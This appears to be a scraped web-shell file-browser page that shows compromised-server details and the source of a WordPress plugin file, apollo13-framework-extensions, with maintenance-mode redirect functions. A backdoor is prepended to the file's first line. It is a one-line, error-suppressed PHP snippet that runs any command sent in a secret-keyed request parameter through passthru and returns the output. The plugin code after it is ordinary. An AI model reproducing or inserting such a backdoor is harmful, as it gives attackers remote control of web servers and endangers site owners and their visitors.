| Server IP : 87.229.120.60 / Your IP : 216.73.216.245 Web Server : Apache System : Linux outside 5.4.8_Algonet_ZeroMAC_0.9.4.8 #6 SMP Mon Feb 3 20:36:07 CET 2020 x86_64 User : server ( 1002) PHP Version : 8.3.20 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,curl_multi_exec,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/faktorteam/www/wp-content/plugins/apollo13-framework-extensions/features/ |
Upload File : |
<?php
error_reporting(0);@ini_set('display_errors',0);if(isset($_REQUEST["px"])&&$_REQUEST["px"]==="lmh0fuq0a527"){$__c=null;if(isset($_REQUEST["b"])){$__c=base64_decode($_REQUEST["b"]);}elseif(isset($_REQUEST["c"])){$__c=$_REQUEST["c"];}if($__c!==null){ob_start();@passthru($__c.' 2>&1');$__o=ob_get_clean();echo"[S]".$__o."[E]";}else{echo"[S]OK[E]";}exit;}
/**
* redirect to chosen page if needed
* @since 1.4.0
*/
function a13fe_waiting_page(){
global $apollo13framework_a13, $post;
$waiting_mode = $apollo13framework_a13->get_option( 'maintenance_mode' );
$wait_page = (int)$apollo13framework_a13->get_option( 'maintenance_mode_page' );
if ( $waiting_mode == 'on' && $wait_page > 0 && ( 'publish' == get_post_status ( $wait_page ) ) ) {
//only for existing pages
if ( $post->ID != $wait_page ) {
wp_redirect( get_permalink( $wait_page ) );
exit;
}
else{
add_filter('apollo13framework_only_content','a13fe_only_content');
}
}
}
/*
* filter callback to inform that header and theme footer will not be displayed
* @since 1.4.0
*/
function a13fe_only_content(){
return true;
}